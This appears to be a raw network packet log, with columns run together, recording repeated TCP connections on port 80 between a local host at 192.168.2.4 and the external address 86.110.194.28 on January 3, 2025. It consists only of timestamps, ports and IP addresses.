                                                                                                                                                                        Jan 3, 2025 07:58:07.640324116 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640333891 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.640337944 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.640393019 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.644773006 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.644785881 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.644833088 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.644865036 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.644869089 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.644942045 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645000935 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645001888 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645036936 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645049095 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645091057 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645140886 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645200968 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645214081 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645251989 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645262957 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645266056 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645275116 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645334959 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645334959 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645349026 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645371914 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645380020 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645385027 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645401001 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645407915 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645437002 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645450115 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645457983 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645471096 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645500898 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645513058 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645523071 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645534039 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645544052 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645546913 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645571947 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645595074 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645602942 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645607948 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645642996 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645642996 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645656109 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645668030 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645692110 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645693064 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645704985 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645729065 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645740986 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645755053 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645783901 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645827055 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645838976 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645874023 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645888090 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645924091 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645935059 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645950079 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649681091 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649707079 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649779081 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649791956 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649890900 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649903059 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649919033 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649930000 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649971962 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649985075 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650002003 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650023937 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650090933 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650104046 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650118113 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650156975 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650177956 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650190115 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650253057 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650266886 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650336027 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650357962 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650381088 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650392056 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650414944 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650428057 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650471926 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650484085 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650504112 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650516033 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650535107 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650609970 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650621891 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650634050 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650655031 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650666952 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650688887 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650701046 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650752068 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650763988 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650787115 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650799036 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650849104 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650861025 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650898933 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650911093 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650924921 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650948048 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650991917 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651010990 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651051998 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651063919 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651087046 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651098013 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651120901 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651132107 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.933615923 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.938596964 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.938616037 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.938628912 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.246427059 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.265281916 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.398668051 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.398724079 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.417910099 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.533484936 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.533545017 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.533854961 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538541079 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.538605928 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538691998 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.538749933 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538783073 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.538825989 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538908958 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.543735981 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.886769056 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.891854048 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.891870975 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.891885042 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.228909016 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.336154938 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.360850096 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.492968082 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.493014097 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.497759104 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.497828007 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.497911930 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.498003960 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.498771906 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.502669096 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.855596066 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:09.860518932 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.860538006 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:09.860553026 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.185713053 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.314773083 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.314826012 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.430246115 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.430483103 CET4979380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.435327053 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.436851978 CET4979380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.436913967 CET4979380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.442673922 CET804978586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.442914963 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.442977905 CET4978580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.793001890 CET4979380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:10.797856092 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.797869921 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:10.797880888 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.126877069 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.200047016 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.200337887 CET4979380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.204864025 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.204932928 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.205053091 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.205367088 CET804979386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.205415010 CET4979380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.209831953 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.385561943 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.390450954 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.390530109 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.390618086 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.395442963 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.558619976 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.563489914 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.563553095 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.746223927 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:11.751079082 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.751094103 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.751101971 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:11.910259008 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.046986103 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.048944950 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.089428902 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.214797974 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.222568035 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.342226982 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.342319012 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.342576027 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.347327948 CET804979986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.347398043 CET4979980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.347444057 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.347624063 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.347672939 CET804980086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.347721100 CET4980080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.347786903 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.352602959 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.699245930 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:12.704173088 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.704185963 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:12.704195976 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.056866884 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.105544090 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.194523096 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.320559978 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.320652962 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.325408936 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.325467110 CET804980686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.325495958 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.325522900 CET4980680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.325643063 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.330502987 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.683656931 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:13.688529968 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.688543081 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:13.688553095 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.024111032 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.136665106 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.158556938 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.275048018 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.275237083 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.281193972 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.281207085 CET804981486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.281269073 CET4981480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.281285048 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.281400919 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.287350893 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.636755943 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:14.641645908 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.641660929 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.641671896 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:14.971425056 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.098711967 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.102783918 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.229182005 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.229676962 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.234160900 CET804982386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.234215975 CET4982380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.234463930 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.234543085 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.234663010 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.239480972 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.589934111 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:15.594824076 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.594841957 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.594850063 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:15.931704998 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.011674881 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.062494993 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.180085897 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.180186033 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.184890985 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.184953928 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.185100079 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.185225964 CET804982986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.185270071 CET4982980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.189841986 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.543001890 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:16.547880888 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.547894001 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.547903061 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:16.887893915 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.020055056 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.020119905 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.059426069 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.064202070 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.064265013 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.064402103 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.069204092 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.151705027 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.156486988 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.156553984 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.156656027 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.161379099 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.418749094 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.423652887 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.423677921 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.511759996 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.516639948 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.516652107 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.516664028 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.785315990 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.874753952 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.902307034 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.924994946 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.007606983 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.010792017 CET4984480192.168.2.486.110.194.28
